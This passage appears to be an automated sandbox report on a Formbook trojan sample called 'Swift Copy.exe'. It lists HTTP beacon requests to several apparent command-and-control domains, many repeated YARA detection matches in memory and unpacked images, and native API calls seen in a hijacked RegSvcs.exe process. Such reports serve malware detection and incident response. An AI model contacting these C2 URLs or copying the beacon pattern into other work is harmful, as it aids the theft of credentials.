49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
          Source: unknown | DNS traffic detected: queries for: www.blackyaga.xyz
          Source: global traffic | HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1 | Host: www.blackyaga.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1 | Host: www.expectedclosure.one | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1 | Host: www.kinemartigues.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1 | Host: www.epic45.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1 | Host: www.mogdento.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

          E-Banking Fraud

          Source: Yara match | File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Swift Copy.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 018CB150 appears 75 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019099D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019098A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0190B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0190A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019095F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0190AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0190A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0190A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_019096D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01909670 NtQueryInformationProcess,
          Source: Swift Copy.exe, 00000000.00000002.295533138.0000000007180000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.295486432.0000000007030000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000003.256962954.0000000006ED1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.295288775.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000002.284608017.00000000023EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
